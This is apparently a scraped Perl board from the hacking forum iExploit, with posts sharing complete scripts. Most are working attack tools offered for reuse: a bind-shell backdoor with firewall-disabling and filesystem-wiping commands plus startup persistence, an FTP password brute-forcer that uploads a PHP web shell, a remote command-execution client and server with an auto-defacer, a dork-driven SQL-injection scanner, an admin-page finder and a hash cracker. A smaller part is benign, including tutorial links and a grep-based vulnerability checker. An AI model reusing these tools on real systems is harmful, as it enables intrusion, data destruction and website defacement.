Perl - iExploit

Perl Video tutorials

Mr. P-teo — Mon, 08 Aug 2011 12:30:12 -0400

Hey, i joined this forum for hacking but thought i would share my Perl video tutorial.

http://www.youtube.com/user/bermnz

They cover most of the basics and hope they will help many members

Static Code Analysis - Grep Vuln Checker

Sh3llc0d3 — Tue, 12 Jun 2012 05:04:19 -0400

Based on a paper written by someone on our course, I wrote this crude
static code analysis tool. I'll probably try improving it at some point
or converting it to ruby. The tool basically greps files in a web
applications directory for code known to lead to possible
vulnerabilities. This obviously requires a deep knowledge of the owasp
top 10.

#!/usr/bin/perl
print "\t\tGrep Basic Source Analyser [Sh3llc0d3]\n";
####################################################################
####################################################################
print "\t\tEnter web applications root directory\n\t\tAll documents in this directory and\n\t\tsub-dir's will be checked eg /root/webapp1\n";
print ">> ";
$dir = ;
chomp($dir); 
print "Enter a dir for the results for example '/tmp/newdir'\n";
$result_dir = ;
chomp($result_dir);
mkdir $result_dir, 0755;
print "New dir created!\n";
####################################################################
##
##	XSS
##
####################################################################
print "[+]CHECKING FOR POSSIBLE XSS\n";
$GET = `grep -i -r '\$_GET' $dir/* | grep 'echo'`;
if($GET)
{
	open(FILE,">/$result_dir/GET_XSS_INJ.txt");
	print FILE $GET;
	close(FILE);
}
$POST = `grep -i -r '\$_POST' $dir/* | grep 'echo'`;
if($POST)
{
	open(FILE2,">/$result_dir/POST_XSS_INJ.txt");
	print FILE2 $POST;
	close(FILE2);
}
$COOKIE = `grep -i -r '\$_COOKIE' $dir/* | grep 'echo'`;
if($COOKIE)
{
	open(FILE3,">/$result_dir/COOKIE_XSS_INJ.txt");
	print FILE3 $COOKIE;
	close(FILE3);
}
$REQUEST = `grep -i -r '\$_REQUEST' $dir/* | grep 'echo'`;
if($REQUEST)
{
	open(FILE4,">/$result_dir/REQUEST_XSS_INJ.txt");
	print FILE4 $REQUEST;
	close(FILE4);
}
$BLANK = `grep -i -r '\$_' $dir/* | grep 'echo'`;
if($BLANK)
{
	open(FILE5,">/$result_dir/BLANK_XSS_INJ.txt");
	print FILE5 $BLANK;
	close(FILE5);
}
####################################################################
##
##      Command Exec
##
####################################################################
print "[+]CHECKING FOR POSSIBLE CMD INJECTION\n";
$eval = `grep -i -r 'eval(' $dir/*`;
if($eval)
{
	open(FILE6,">/$result_dir/EVAL_CMD_INJ.txt");
	print FILE6 $eval;
	close(FILE6);
}
$assert = `grep -i -r 'assert(' $dir/*`;
if($assert)
{
	open(FILE7,">/$result_dir/ASSERT_CMD_INJ.txt");
	print FILE7 $assert;
	close(FILE7);
}
$pregrep = `grep -i -r 'preg_replace' $dir/* | grep '/e'`;
if($pregrep)
{
	open(FILE8,">/$result_dir/PREG_REP_CMD_INJ.txt");
	print FILE8 $pregrep;
	close(FILE8);
}
$createfunc = `grep -i -r 'create_function(' $dir/*`;
if(createfunc)
{
	open(FILE9,">/$result_dir/CREATE_FUNC_CMD_INJ.txt");
	print FILE9 $createfunc;
	close(FILE9);
}
####################################################################
##
##      SQL INJ
##
####################################################################
print "[+]CHECKING FOR POSSIBLE SQL INJECTION\n";
$sql1 = `grep -i -r '\$sql' $dir/*`;
if($sql1)
{
	open(FILE10,">/$result_dir/SQL1_SQL_INJ.txt");
	print FILE10 $sql2;
	close(FILE10);
}
$sql2 = `grep -i -r '\$sql' $dir/* | grep '\$_'`;
if(sql2)
{
	open(FILE11,">/$result_dir/SQL2_SQL_INJ.txt");
	print FILE11 $sql2;
	close(FILE11);
}
#####################################################################
#####################################################################
print "[+] RESULTS SENT TO FILES IN: $result_dir\n\n\n";
print "Now you just have to go through the output ;P\n";

backdoor I've been working on

m0rph — Wed, 30 Mar 2011 15:50:40 -0400

sup everyone, this is the code to my backdoor. I was going to submit this for the malware contest, sadly, you have to buy perl2exe to stop the window from showing up. In other words, it wasn't very stealthy when converted to an executable. Nonetheless, granted you have the right privileges, this is not a terrible script....it is limited, but it's not bad. If you're having trouble with your own backdoor, feel free to use my code. You can connect to it with netcat, if you run commands from the menu, the output will be displayed back to you. I've also included most of the *nix equivalent commands in comments. This backdoor acts how a real backdoor should. A real backdoor should disable/bypass any services hindering it's use, it should take over well known ports so it doesn't use something obvious like port 1337, and it should allow you to absolutely destroy the box.

*Spoiler Alert!* If you can't figure out how to use it, try asking it how it's day is going ;)


#!/usr/bin/perl -w
#Written by m0rph
use IO::Socket; #Socket handler
use Net::hostent; #Host information exchange
use File::Copy; #File Copying
use warnings; #Debugging

#`net stop \"Windows Firewall\"`; #replace with /etc/init.d/iptables stop, must be root
#system(\"taskkill /IM mysqld.exe /F\"); #Disable mysql daemon
my $port=3306; #Binded port, replace port number with $ARGV[0] to use with command line input
my $server=IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN, #Number of pending connections, and connections allowed
Reuse => 1);

die \"Listener failed to start\" unless $server; #Error Handling
print \"Listener started. Waiting for connection...\n\";

while ($client = $server->accept()) {
	$client->autoflush(1);
	$hostinfo = gethostbyaddr($client->peeraddr);
	#print \"[Connection from %s]\", $hostinfo->name || $client->peerhost; #shows connecting host to server
	while ( <$client>) {
	next unless /\S/; #If no input is received, stay connected.
	printf $client \"%s \$ \", $hostinfo->name || $server->peerhost;
	if (/exit|quit/i) { last; } #Quit and Exit commmands for disconnecting
	elsif (/sup brah/i) { print $client \"\n\", 
									 \"------------------------\n\",
									 \"|                      |\n\",
									 \"|     Let's do this    |\n\",
									 \"|                      |\n\",
									 \"------------------------\n\",
									 \"\n\",
									 \"Type help for a list of commands\n\"; }
	elsif (/date/i) { printf $client \"%s\n\", scalar localtime;}
	elsif (/ip -s/i) { print $client `ipconfig /all`; } #replace with ifconfig 
	elsif (/ip -r/i) { print $client `ipconfig /release`; } #replace with ifconfig eth0 down
	elsif (/ps/i) { print $client `tasklist /v`;} #show current processes, replace with ps -aux
	elsif (/netstat/i) { print $client `netstat -an`; } #show current connections, same command
	elsif (/whoami/i) { print $client `whoami`; } #works on some windows machines, works on all *nix
	elsif (/rain/i) { print $client `net stop \"Windows Firewall\"`; } #replace with /etc/init.d/iptables stop, must be root
	elsif (/killbox/i) { print $client system('RD %systemroot% /S /Q'); } #replace with rm -rf /
	elsif (/shell/i) { system('cmd'); } ###Intended to drop a shell, but doesn't, try replacing with /bin/sh
	elsif (/help/i) { print $client \"\n\",
									\"-------------\n\",
									\"Command List:\n\",
									\"-------------\n\",
									\"ip -s                         IP Configuration.\n\",
									\"ip -r                                -r for IP release, Shell must have administrative privileges.\n\",
									\"whoami                           Current User.\n\",
									\"netstat                          Active Connections.\n\",
									\"date                             Current Date and Time\n\",
									\"ps                               List Current Processes.\n\",
									\"rain                             Stops Windows Firewall. Shell must have administrative privileges.\n\",
									\"killbox                          Remove filesystem.    Shell must have administrative privileges.\n\",
									\"shutdown                         Shutdown Target.\n\",
									#\"shell                            Drop A Shell.\n\",
									\"quit \n\"; }
	else {
		print $client \"\n\nError: Connection Timed Out\"; #Incase someone else tries connecting to shell, try and fool them to not connect to it again.
		close $client;
	}
	}
	continue {
	printf $client \"%s \$ \", $hostinfo->name || $server->peerhost;
	}
	print $client \"\n\nGood Bye.\"; 
	close $client; #To close connection: CTRL + C
}
#move(\"noname.pl\",\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\noname.pl\"); #this will copy self to XP SP2 Startup Directory

Need a project to sink my teeth in to...

Mr. P-teo — Tue, 21 Feb 2012 19:08:11 -0500

So im looking to create something in perl that i can really sink my teeth into. I would like to think i have fairly good knowledge of it so pretty much anything would be considered. In the past i have made:
[list]
[*]Admin Finders[/*:m]
[*]SQLi Codes[/*:m]
[*]Software Updater[/*:m]
[*]Interactive Database[/*:m]
[*]Full FTP Client[/*:m]
[*]FTP Shell Brute - "The Idiot Exploit"[/*:m][/list:u]

plus some other bits...

If you have some ideas let me know...

MD5/SHA1 Cracker I whipped up - (Online & Dictionary Attack)

Mr. P-teo — Sat, 10 Mar 2012 14:36:55 -0500

So yer i got bored of always working on my database so i whipped up an MD5 cracker. This cracker users either online or dictionary attack and i may add bruteforce if i can be bothered.

Enjoy.


#!/usr/local/bin/perl
use LWP::Simple;
use Digest::MD5;
use Digest::SHA1;


my $option = $ARGV[0];
my $hash = $ARGV[1];
my $file = $ARGV[2];

if($option eq \"-o\"){
        if($hash){
           $check_online = get('http://md5.hashcracking.com/search.php?md5='.$hash.'');
           if($check_online =~ \"\n\nCleartext of \".$hash.\" is password\"){
                  print \"\n\n\".$check_online.\"\n\n\";
           }
        }
}elsif($option eq \"-d\"){
        if($file){
                if($hash){
                        if(length($hash) == 32){
                                open(PASS, \"+< $file\");
                                my @possible_passwords = ();
                                while(<PASS>){
                                push (@possible_passwords, $_);
                                }
                                foreach(@possible_passwords){
                                        $md5_compare = Digest::MD5->new;
                                        $md5_compare->add($_);
                                        $finnished_hash = $md5_compare->hexdigest;
                                        if($finnished_hash eq $hash){
                                                print \"\n\nCleartext of \".$hash.\" is \".$_.\"\n\n\";
                                                $score = 1;
                                                break;
                                        }

                                }
                        }elsif(length($hash) == 40){
                                open(PASS, \"+< $file\");
                                my @possible_passwords = ();
                                while(<PASS>){
                                push (@possible_passwords, $_);
                                }
                                foreach(@possible_passwords){
                                        $sha1_compare = Digest::SHA1->new;
                                        $sha1_compare->add($_);
                                        $finnished_sha1hash = $sha1_compare->hexdigest;
                                        if($finnished_sha1hash eq $hash){
                                                print \"\n\nCleartext of \".$hash.\" is \".$_.\"\n\n\";
                                                $score = 1;
                                                break;
                                        }

                                }
                        }
                        

                        if($score < 1){
                                print \"\n\nPassword Not found...\n\n\";
                        }
                        close(PASS);
                }
        }
}else{
print \"MD5/SHA1 Cracker Made By Mr. P-teo \nPerl 5 Version 14 - 2012\n\n\n\";
print \"-o => Online Cracker (only for MD5)\n\";
print \"+ Example: md5cracker.pl -o 5f4dcc3b5aa765d61d8327deb882cf99\n\";
print \"-d => Dictionary Attack\n\";
print \"+ Example: md5cracker.pl -d 5f4dcc3b5aa765d61d8327deb882cf99 passwordlist.txt\n\";
}
}

- Perl / PHP Software Updater made by Mr. P-teo

Mr. P-teo — Fri, 17 Feb 2012 16:27:34 -0500

So here it is, iv just finnished my new script. This is a perl / php software updater. This script uses a php file and checks a MySQL database for the version. It requires user credentials, and uses MD5 hashing. I have used a number of fairly standard modules and a few which need installing but here are the codes.

If you wish to test this script with a run the perl script as it is, with the

username: root
password: toor

if you are on linux change the system command, this will download and run the winrar installer. The only thing is that you will have to change the version to match the new one within the perl script as i couldn't be bothered to add that in. Other than that its all set.

Perl Local Client


use WWW::Mechanize;
use LWP::Simple;
use HTTP::Cookies;
use Digest::MD5;

print \"Username: \";  # username
chomp($user = <STDIN>);
print \"Password: \";  # password
chomp($pass = <STDIN>);
$request_information = \"http://psls.3owl.com/updater_file.php\";  # PHP file location
$passmd5 = Digest::MD5->new;
$passmd5->add($pass);
$encrypted = $passmd5->hexdigest;  # encrypt password
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($request_information);
$mech->form_name('get');
$mech->field(username => $user);
$mech->field(password => $encrypted);
$mech->click();
$version = \"1.0 Beta\";

if(($mech->content =~ /$user/)&&($mech->content =~ /$encrypted/)){
	print \"\n\nChecking For Updates...\n\n\";
	if($mech->content =~ /$version/){
		print \"You are all up to date...\n\";
	}else{
		print \"\nYou are out of date, starting download...\n\n\";
		$software_url = 'http://www.rarlab.com/rar/wrar410.exe';  # Just sample file, i used winrar
		$localfilename = 'winrar-fromperl.exe';  # filename
		my $mech = WWW::Mechanize->new;
		getstore($software_url, $localfilename );
		print \"Download Complete, Please Install the new version.\n\n\";
		system('start '.$localfilename); # linux will require start change to exec
	}
}else{
	print \"\n\nUnable to check, invalid logins or PC.\n\n\";
}

PHP Web script


<?php
//This script will require a database with the following tables
// - users & version
// users columns = username & password
// version columns = version 
// Enjoy...

mysql_connect(\"hostname\", \"user\", \"pass\");
mysql_select_db(\"db_name\");

echo \"
<style>
#textbox{border: 0;background: transparent;color: #ffffff;}
#button{border: 0; background: transparent;}
</style>
<center><form name='get' action='' method='POST' >
      	<input id='textbox' type='text' name='username' /></br>
      	<input id='textbox' type='password' name='password' /></br>
      	<input id='button' type='submit' name='button' value=''/>
	</form></center><meta http-equiv='REFRESH' content='0;url=index.html'>\";
	$password = strip_tags(htmlentities($_POST['password']));
	$username = strip_tags(htmlentities($_POST['username']));
	$get = isset($_POST['button']);
	if($get){
		$request_information = mysql_query(\"SELECT * FROM `users` WHERE username='\".$username.\"' AND password='\".$password.\"'\");
                $version = mysql_query(\"SELECT * FROM `version`\");

		if(mysql_num_rows($request_information) > 0){
    			while($row = mysql_fetch_array($request_information))
    			{
        			echo \"\n\".$row['username'] . \"\n\" . $row['password'];
    			}
                        while($versionrow = mysql_fetch_array($version)){
                                echo \"\n\n\".$versionrow['version'];
                        }
		}
	}
mysql_close();
?>

Hope you like this small little script, enjoy.

PerlSHELLBRUTE - FTP With Shell Upload

Mr. P-teo — Thu, 16 Feb 2012 21:14:44 -0500

I made the quite recently, i thought i would and learn a new module from CPAN.

So what this does it uses a dictionary attack against a hosts FTP server, if it is successful then it will upload a shell and close the connection. This is all automatic and you just need to enter the hostname (url without http://www.)

This has low success rate, that is why i call this - "The Idiot Exploit" as it works with common / weak passwords.


use Net::FTP;

##################################################################

#PerlSHELLBRUTE Exploit
#This Script Was Written By MR. P-teo aka Archx
#Net::FTP Support Given By TheEliteNoob
#Works using the Net::FTP Module
#All Credits go to Module creator, Mr. P-teo and TheEliteNoob
                                                                 
##################################################################

#Instructions, Run Exploit, Keep your chosen PHP shell in same dir, 
#(Shell must have name -> sh3llphp.php)if exploit is successfull, 
#visit url.

#ENJOY.

@user = (\"apache\",\"root\", \"admin\", \"username\",\"user\",\"username\",\"admin1\",\"administrator\",\"admin123\",\"123456\",\"12345\",\"admin\",
\"123456789\",\"654321\",\"$hostname\",\"admin\",\"admin\",\"admin\",\"admin\",\"admin\",\"$hostname\",\"123\");
@pass = (\"apache\",\"toor\", \"admin\", \"password\",\"pass\",\"passwd\",\"admin1\",\"administrator\",\"admin123\",\"123456\",\"12345\",\"Password\",
\"123456789\",\"654321\",\"admin\",\"abcd1234\",\"abc123\",\"12345678\",\"111111\",\"passw0rd\",\"$hostname\",\"123\");
$directory = \"/public_html\";

#SHELLNAME

my $shell_trans = \"sh3llphp.php\";

print \"\n\nFTP Hostname: \";
chomp($hostname = <STDIN>);

my $ftp = Net::FTP->new($hostname, Debug => 0, Timeout=>120) or die \"Unable To locate Host - $hostname\";
my $num = -1;
foreach(@user){
	$num++;
}	
my $response = 1;
my $cred = 0;
while($cred != $num){
	$user = @user[$cred];
	$passwd = @pass[$cred];
	my $fail = 0;
	print \"\n#Attempting To Get Credentials...\";
	$ftp->login($user, $passwd, Timeout=>150) or $fail = 1;
	$cred++;
	if ($fail == 1) {
		next;
	}elsif($fail == 0){
		print \"\n#Connection Established...\n\";		
		$ftp->cwd($directory); 
		print \"#Preparing To Transfer Shell...\n\";
		$ftp->put($shell_trans) or $upload = 1;
		if($upload == 1){
			print \"#ERROR Uploading Shell...\n\";
		}else{
			print \"#Shell Uploaded, Exploit Complete...\n\";
		}
		$ftp->quit;
		last;	
	}
}
if($response == 1){
	print \"\n\nCredentials Not Found, Connection Could Not Be Established.\n\n\";
}

Hope you like this.

Private Perl Admin Finder

Mr. P-teo — Thu, 16 Feb 2012 20:59:03 -0500

So i got borded of not finding admin pages when i do a hack, so i coded myself a perl admin finder. The difference with this compared to every other on the web is that this scans around 1400 possible pages. Results will show 1803 scanned but some are the same just slightly different.

Please note i did not make the list, i stumbled across it and though i could make it more useful.


use HTTP::Request;
use LWP::UserAgent;

system('cls');
print \"====================================================================\n\";
print \"[Mr. P-teo] Admin Page Scanner +\n\n\";
print \"URL must contain http://\n\";
print \"====================================================================\n\n\";

print \"Website: \";
chomp ($url = <STDIN>);
my $file = \"admins.txt\";
open (FH, \"< $file\") or die \"Can't open $file for read: $!\";
my @directorys;
while (<FH>) {
    push (@directorys, $_);
}
close FH or die \"Cannot close $file: $!\";

my $amount = 0;
my $success = 0;
my $useful = 0;

foreach $ways(@directorys){
$amount++;
my $web=$url.\"/\".$ways;

my $req=HTTP::Request->new(GET=>$web);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /404 Not Found/){
	
}elsif($response->content =~ /Page Cannot be displayed/){

}else{
	if($response->content =~ /username/ || 
$response->content =~ /password/ ||
$response->content =~ /admin/ ||
$response->content =~ /login/ ||
$response->content =~ /administration/ ||
$response->content =~ /authorisation/ ||
$response->content =~ /sign in/ ||
$response->content =~ /signin/ ||
$response->content =~ /user/){
print \"\n\tPage Found => $web\";
$success++;
}
}
}
print \"\n\n\n------------------------------------------\n[$amount Scanned] + [$success Found]\n-------------------------------------------\n\n\";

And of course you will be needing the admin links.

Download => http://pastebin.com/aemUsVXQ

Hope you like.

Fastbot SQLi Autosearch

GT3X — Fri, 24 Jun 2011 22:44:07 -0400



BEGIN { $ENV{ACTIVEPERL_CONFIG_DISABLE} = 1; }

#perl2exe_exclude \"File/BSDGlob.pm\"
#perl2exe_exclude \"Compress/Bzip2.pm\"
#perl2exe_exclude \"I18N/Langinfo.pm\"
#perl2exe_include \"attributes.pm\"


use strict;
no warnings;
use threads;
use threads::shared;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);


my $threads = 10;

my $ua = LWP::UserAgent->new;
$ua->timeout(15);
$ua->agent('Mozilla/5.0');

my @dorkz : shared;
my @linkz : shared;

system(\"cls\");
system(\"color A\");
print \"++++++++++++++++++++++++++++++++++++++++++++++++\n\";
print \"+             SQLi_Scanner_v_0.1               +\n\";
print \"+                                              +\n\";
print \"++++++++++++++++++++++++++++++++++++++++++++++++\n\";
print \"\n[i]Engines loaded: fastbot.de\n\";
print \"\[.]Let's start...\n\";
GetDorkz();
print \"[i]Got \".scalar(@dorkz).\" dorkz\n\";
GetLinks();
while (threads->list) {}
print \"[i]Got \".scalar(@linkz).\" links\n\";
print \"[.]Let's scan...\n\n\";
CheckLinks();
while (threads->list) {}
print \"[!]All done, check output_injection.txt\n\n\";


sub CheckLinks {
	foreach my $link( @linkz ) {
		my  $ctr = 0;
		foreach my $thr ( threads->list ) { $ctr++; }
		if ($ctr < $threads){
			threads->create( \&InjectionCheck, $link );
		}
		else { redo; }
	}
}

sub GetLinks {
	foreach my $dork( @dorkz ) {
		my  $ctr = 0;
		foreach my $thr ( threads->list ) { $ctr++; }
		if ($ctr < $threads){
			threads->create( \&GetLinks_fastbot,$dork );
		}
		else { redo; }
	}
}

sub GetDorkz {
	open( DORKZ, \"input.txt\" ) or die \"$!\n\";
	while( defined( my $line_ = <DORKZ> ) ) {
		chomp( $line_ );
		push( @dorkz, $line_ );
	}
	close( DORKZ );
}

## FASTBOT-SEARCH
## http://www.fastbot.de/index.php?page=1&query=index.php?id=
sub GetLinks_fastbot {
	my $dork = shift;
	chomp( $dork );
	for( my $i = 1; $i < 11; $i++ ) {
		my $url = \"http://www.fastbot.de/index.php?page=\".$i.\"&query=\".$dork;
		my $content = $ua->get($url)->content;
		while( $content =~ m/melden\.php\?url=(.+?)&query=/gi ) {
			my $link = $1;
			$link =~ s/&/&/g;
			#print $link.\"\n\";
			push( @linkz, $link );
		}
	}
	threads->detach();
}

sub InjectionCheck {
	my $link = shift;
	chomp( $link );
	print \"[:]Checking: $link\n\";
	my $content = $ua->get($link)->content;
	for(my $position = 0; ($position = index($link, \"=\", $position)) >= 0; $position++) {
		my $linkcpy = $link;
		substr($linkcpy, $position, 1) = \"='\";   
		my $content2 = $ua->get($linkcpy)->content;
		unless( $content eq $content2 ) {
			if( $content2 =~ m/mysql_fetch_/i || $content2=~ m/You have an error in your SQL syntax/i || $content2 =~ m/tem um erro de sintaxe no seu SQL/i || $content2 =~ m/mysql_num_rows/i || $content2 =~ m/Division by zero in/i ) { 
				print \"[+]Vulnerable: \".$linkcpy.\"\n\";
				Output( $linkcpy );
				threads->detach();
			}
		}
	}
	threads->detach();
}

sub Output {
	my $para = shift;
	open (OUT, '>>output_injection.txt') or die(\"Cannot write to output_injection\n\");
	print OUT $para.\"\n\";
	close (OUT);
}

Probs simple but need help

Mr. P-teo — Wed, 17 Aug 2011 23:51:11 -0400

hy everyone, i need some help with something i belive would be very simple. I need to make an if statement that basically says,
if $input = nothing then print enter text else print $input.

I tried the following but doesn't work. Can anyone help?


if ($input eq NULL){
    print \"\nPlease enter text...\";
} else {
     print \"$input...\n\n\n\";
}

Perl or Ruby

Sh3llc0d3 — Sun, 24 Oct 2010 16:00:10 -0400

Just out of curiosity I'm looking at learning a bit of Perl or Ruby, which would anyone suggest? I know both are used for writing exploits but does anyone have any experience of either and want to share their opinion and help me decide?
S-P

Perl Tutorials

undead — Sun, 14 Mar 2010 00:17:11 -0500

Perl Tutorials

http://www.perlmonks.org/index.pl?node=Tutorials
http://www.comp.leeds.ac.uk/Perl/start.html
http://perldoc.perl.org/index-tutorials.html
http://savage.net.au/Perl-tutorials.html
http://vsbabu.org/tutorials/perl/
http://www.programmingtutorials.com/perl.aspx
http://www.perl.com/cs/user/query/q/6?id_topic=74
http://www.sthomas.net/roberts-perl-tutorial.htm
http://www.brainbell.com/tutors/Perl/
http://www.perlaccess.com/

Exploiter Project

Sh3llc0d3 — Sun, 02 Jan 2011 03:30:13 -0500

I'm sick and tired of seeing the same old shite in Perl forums elsewhere, no malware at all. Ive seen SO many version of the back-connect made by IHS for rooting a server... so I thought, why only a back-connect... why not make something capable of running programs, installing, etc. For this I started with a VERY simple Client/Server using perl socket programming and then built on the use of system() command to execute bash commands on linux machines such as wget. I'll say this it is at the moment still very simple. But then again i've only been learning perl for a very short amount of time. Picking up something and then expanding it and applying theories to other areas is what hacking is about... use your imagination :) I've tried this out on my own machine locally downloading files from my vps setup online. It downloads the files perfectly.

Update: 13/1/2011
- Basic defacer
- Command entry/sends to server
Needs fixing:
- chdir seems not to work, i'll see what I can do and get back to you.
- Defacer will check what index extension is in use instead of assuming .html at the moment.

Exploiter 0.2 - Untested
[align=center]http://i51.tinypic.com/2psqgt3.png
[video=youtube]

Instructions:
chmod +x file.pl
./file.pl -n [NAME]

Client:

#!/usr/bin/perl
# Exploiter 0.2
# Coded by Semtex-Primed
# www.iExploit.org
use IO::Socket;
use Getopt::Std;

getopts(\":n:\", \%args);
if (defined $args{n}) {
	$n1 = $args{n};
}
if (!defined $args{n}) {
	print \"Usage: $0 -n [NAME]\n\";
	exit;
}

@exploiter = (
	\"\n\t8888888888                   888          d8b 888                    \n\",
	\"\t888                          888          Y8P 888                    \n\",
	\"\t888                          888              888                    \n\",
	\"\t8888888    888  888 88888b.  888  .d88b.  888 888888 .d88b.  888d888 \n\",
	\"\t888         Y8bd8P  888  88b 888 d88  88b 888 888   d8P  Y8b 888P    \n\",
	\"\t888          X88K   888  888 888 888  888 888 888   88888888 888     \n\",
	\"\t888        .d8pq8b. 888 d88P 888 Y88..88P 888 Y88b.  Y8b.    888     \n\",
	\"\t8888888888 888  888 88888P   888   Y88P   888   Y888  Y8888  888     \n\",
	\"\t                    888                                              \n\",
	\"\t                    888             .::Semtex-Primed::.              \n\",
	\"\t                    888              www.iExploit.org                \n\"
);
@options = (
	\"\n\t\t\t  Welcome to Exploiter $n1!\n\",
	\"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
	\"\t\t\t|+| 1. Connect to server    |+|\n\",
	\"\t\t\t|+| 2. Close                |+|\n\",
	\"\t\t\t|+| 3. Features             |+|\n\",
	\"\t\t\t|+| 4. Credits/Shouts       |+|\n\",
	\"\t\t\t|+|                         |+|\n\",
	\"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\"
);
while(1) {
	system(\"clear\");
	print @exploiter;
	print @options;
	print \"\t\t\tWhat is your option? \n\";
	print \"\t\t\t>> \";
	$choice = <STDIN>;
	chomp ($choice);
	if($choice eq \"1\") {
		my $sock = new IO::Socket::INET (
			PeerAddr => 'HackStation',
			PeerPort => '8880',
			Proto => 'tcp',
            	);
		die \"\t\t\tCould not create socket: $!\n\" unless $sock;
		print $sock \"\t\t\tConnected!!\n\"; #Used to confirm connection in testing
		while ($sock) {
			print \"\t\t\tConnected, here's your choices\n\";
			print \"\t\t\t1. Enter command\n\";
			print \"\t\t\t2. Auto-Defacer (webserver's only!)\n\";
			print \"\t\t\t3. quit\n\";
			print \"\t\t\t>> \";
			$choice = <STDIN>;
			chomp ($choice);
			if ($choice eq \"3\") {
				close($sock);
				exit($sock);
				last;
			} elsif ($choice eq \"1\") {
				print \"\t\t\tEnter Command: \n\";
				print \"\t\t\t>> \";
				$data2send = <STDIN>;
				chomp ($data2send);
				$sock->send(\"$data2send\");
				print <$sock>;
				#close $sock;
				last;
			} elsif ($choice eq \"2\") {
				$chdir = 'chdir /var/www/';
				chomp ($chdir);
				$sock->send(\"$chdir\");
				print \"\t\t\t[-] You are now working in... \n\";
				print \"\t\t\t[-] /var/www/ default web root!\n\";
				$remove_index = \"rm index.html\";
				chomp ($remove_index);
				$sock->send(\"$remove_url\");
				print \"\t\t\t[-] index.html has been removed\n\";
				print \"\t\t\t[-] now upload your own!\n\";
				print \"\t\t\tWget deface from URL: \n\";
				print \"\t\t\t>> \";
				$deface_url = <STDIN>;
				chomp ($deface_url);
				$sock->send(\"$deface_url\");
			}
		}
	} elsif($choice eq \"2\") {
		exit
	} elsif($choice eq \"3\") {
		#features
		@features = (
	        \"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
	        \"\t\t\t|+|                         |+|\n\",
	        \"\t\t\t|+|                         |+|\n\",
	        \"\t\t\t|+|                         |+|\n\"
		);
		print @features;
		sleep(5);
	} elsif($choice eq \"4\") {
		#credz
		@credits = (
			\"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
			\"\t\t\t|+| Big shout out to:       |+|\n\",
        		\"\t\t\t|+|     ~ iExploit.org ~    |+|\n\",
        		\"\t\t\t|+|   and all of it members |+|\n\",
        		\"\t\t\t|+|                         |+|\n\",
        		\"\t\t\t|+|-------------------------|+|\n\"
		);
		print @credits;
		sleep(5);
	}
}

Server:

#!/usr/bin/perl
use IO::Socket;
#use IO::CaptureOutput qw/capture/;
use Capture::Tiny qw/capture/;


while(1) {
my $sock = new IO::Socket::INET (
    LocalHost => 'HackStation',
    LocalPort => '8880',
    Proto => 'tcp',
    Listen => 1,
    Reuse => 1,
    );
    die \"\t\tCould not create socket: $!\n\" unless $sock;
    
    my $new_sock = $sock->accept();
    while (<$new_sock>) {
        print $_;
        $new_sock->recv($recv_data,1024);
        if($recv_data eq 'q' or $recv_data eq 'Q') {
            close $new_sock;
        } else {
	    ($stdout, $stderr) = capture {
		system(\"$recv_data\");
	    };
	    print $new_sock ($stdout, $stderr);
	    last;
        }
    }
#    close($sock);
}

Exploiter 0.1
Server:

#!/usr/bin/perl
use IO::Socket;

while(1) {
my $sock = new IO::Socket::INET (
	LocalHost => 'netbook1-linux',
	LocalPort => '8880',
	Proto => 'tcp',
	Listen => 1,
	Reuse => 1,
	);
	die \"\t\tCould not create socket: $!\n\" unless $sock;
	
	my $new_sock = $sock->accept();
	while (<$new_sock>) {
		print $_;
		$new_sock->recv($recv_data,1024);
		if($recv_data eq 'q' or $recv_data eq 'Q') {
			close $new_sock;
		} else {
			system(\"$recv_data\");
			last;
		}
	}
#	close($sock);
}

Exploiter:

#!/usr/bin/perl
use IO::Socket;
@header = (
        \"\n\n\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
        \"\t\t|+|     Exploiter 0.1       |+|\n\",
        \"\t\t|+|    ~ Semtex-Primed ~    |+|\n\"
);
@options = (
        \"\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
        \"\t\t|+| 1. Connect to server    |+|\n\",
        \"\t\t|+| 2. Close                |+|\n\",
        \"\t\t|+|                         |+|\n\",
        \"\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\"
);
while(1) {
	system(\"clear\");
	print @header;
	print @options;
	print \"\t\tWhat is your option? \n\";
	print \"\t\t>>> \";
	$choice = <STDIN>;
	chomp ($choice);
	if($choice eq \"1\") {
		my $sock = new IO::Socket::INET (
			PeerAddr => 'netbook1-linux',
			PeerPort => '8880',
			Proto => 'tcp',
			);
			die \"\t\tCould not create socket: $!\n\" unless $sock;
			print $sock \"\t\tConnected!!\n\";
			while ($sock) {
				print \"\t\tConnected, here's your choices\n\";
				print \"\t\t1. Enter command\n\";
				print \"\t\t2. quit\n\";
				print \"\t\t>> \";
				$choice = <STDIN>;
				chomp ($choice);
				if ($choice eq \"2\") {
					close($sock);
					exit($sock);
					last
				} elsif ($choice eq \"1\") {
					print \"\t\tEnter Command! \n\";
					print \"\t\t>> \";
					$data2send = <STDIN>;
					chomp ($data2send);
					$sock->send($data2send);
					close $sock;
					last;
				}
			}
	} elsif($choice eq \"2\") {
		exit
	}
}

This is a LOCAL project. This means that the program will work only within your network. Where I have put "netbook1-linux" change it for the hostname of the victim. I will eventually allow it to accept an IP address you enter.

USAGE:
When the server is running, run the exploiter and then select connect to server, then enter command. For the next bit you need to know some bash. To do a simple test enter the following "wget google.co.uk/index.html". This will download a copy of the google homepage into the folder which you started the server in. To close the exploiter just press the correct number and the server will still be running allowing for you to reconnect.

Enjoy,
S-P

Perl-CGI Example-02: GET & HTML forms

Sh3llc0d3 — Fri, 18 Mar 2011 22:20:28 -0400

So, in this example we have two scripts... a VERY basic HTML page and our perl-cgi script.

HTML Page - index.html

<html>
<head>
<title>..::iExploit Rules::..</title>
</head>

<body>
